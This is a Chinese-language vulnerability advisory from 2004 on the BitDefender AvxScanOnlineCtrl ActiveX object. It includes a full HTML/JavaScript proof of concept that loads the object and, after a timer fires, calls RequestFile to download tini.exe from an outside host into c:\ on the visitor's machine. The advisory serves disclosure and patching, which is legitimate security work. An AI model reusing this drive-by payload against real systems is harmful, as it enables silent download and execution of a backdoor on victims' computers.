Softwin BitDefender AvxScanOnlineCtrl COM对象远程文件上传和执行漏洞
发布日期:2004-04-19
更新日期:2004-04-29
受影响系统:Softwin BitDefender
描述:
BUGTRAQ ID:
10174
BitDefender Scan Online是一款多功能的反病毒产品,包含基于WEB接口的在线扫描系统。
BitDefender AvxScanOnlineCtrl COM对象存在设计错误,远程攻击者利用这个漏洞上传敏感文件到系统中并执行。
AvxScanOnlineCtrl COM对象包含如下函数,可下载远程服务器上的文件并在系统上执行:
object.RequestFile("
http://ntsecurity.nu/downloads/tini.exe ","c:\\");
<*来源:Rafel Ivgi, The-Insider (
nuritrv18@bezeqint.net)
链接:
http://marc.theaimsgroup.com/?t=108240641500010&r=1&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Rafel Ivgi, The-Insider (
nuritrv18@bezeqint.net)提供了如下测试方法:
------------------- CUT HERE -------------------
<OBJECT id=mymy
codeBase=
http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,
1
hspace=0 vspace=0 align="top"
classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA
width=405 height=180>
<PARAM NAME="Id" VALUE="Trusted">
<PARAM NAME="_ExtentX" VALUE="6614">
<PARAM NAME="_ExtentY" VALUE="4498">
<PARAM NAME="_StockProps" VALUE="9">
<PARAM NAME="ForeColor" VALUE="0">
<PARAM NAME="BackColor" VALUE="16777215"></object>
<script>
var a;
function cool() {
mymy.Update();
mymy.Updating(1);
mymy.SetCountry("Israel");
mymy.EnableRtvr(1);
mymy.SetupMode = true;
mymy.RequestFile("
http://ntsecurity.nu/downloads/tini.exe","c:\\");
}
setTimeout("cool()", 1500);
</script>
------------------- CUT HERE -------------------
建议:
厂商补丁:
Softwin
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.bitdefender.com/浏览次数:3153
严重程度:0(网友投票)
